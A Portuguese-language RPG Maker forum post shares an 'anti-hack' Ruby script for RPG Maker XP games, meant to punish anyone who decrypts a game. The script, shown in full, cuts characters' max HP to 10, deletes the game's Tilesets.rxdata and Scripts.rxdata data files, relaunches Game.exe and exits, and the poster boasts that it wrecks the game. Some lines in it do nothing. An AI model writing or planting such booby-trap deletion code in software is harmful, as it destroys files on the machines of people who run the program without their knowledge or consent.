Templo RPG Maker
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

Você não está conectado. Conecte-se ou registre-se

Ver o tópico anterior Ver o tópico seguinte Ir para baixo  Mensagem [Página 1 de 1]

1Anti Hack v1.2 Empty Anti Hack v1.2 25/4/2012, 04:55

BrunoFox

BrunoFox
Administrador
Administrador
um script aqui pra defender do desencriptador mais comum utilizado no RPG Maker XP.

O código abaixo:

Código:

 
##################################################################
#              Sistema Antihack scene debug                      #
#                Créditos: Roberto Dash(criador) 
#                      PedR0 por mostrar a classe Scene_Zlib
##################################################################
class Scene_Zlib      # vem de Z Library
    def main 
#Pronto para reduzir o HP máximo do personagem
        $game_actors[1].maxhp = 10
        $game_actors[2].maxhp = 10
        $game_actors[3].maxhp = 10
 
#Deletar os arquivos
for i in 0..3
    if FileTest.exist?("Data/Tilesets.rxdata")
        File.delete("Data/Tilesets.rxdata" )
        FileTest.exist?("Data/Scripts.rxdata")
        File.delete("Data/Scripts.rxdata")
$RGSS_SCRIPTS.nil?
  Thread.new {system('Game.exe')}
  exit
    end
  end
end
end
 

Insira o script antes do Main.

P:E, o que essa nova versão faz que a outra non faz?
R:Essa aqui faz um belo dum estrago no jogo. Não deleta o save, mas faz coisa bem pior.

P: Porque deleta o arquivo Scripts.rxdata se o jogo está encriptado?
R: Ele deleta pra que, se o jogo for desencriptado, o arquivo de scripts esteja inacessível. Então, assim, tudo o que o cara fez foi ter trabalho pra depois não ter acesso ao que mais queria. Deletar os scripts também impede que o jogo seja rodado.


Créditos:
Roberto Dash
PedR0
BrunoFox (POR POSTAR AQUI)

https://templorpgmakerbr.forumeiros.com

Ver o tópico anterior Ver o tópico seguinte Ir para o topo  Mensagem [Página 1 de 1]

Permissões neste sub-fórum
Não podes responder a tópicos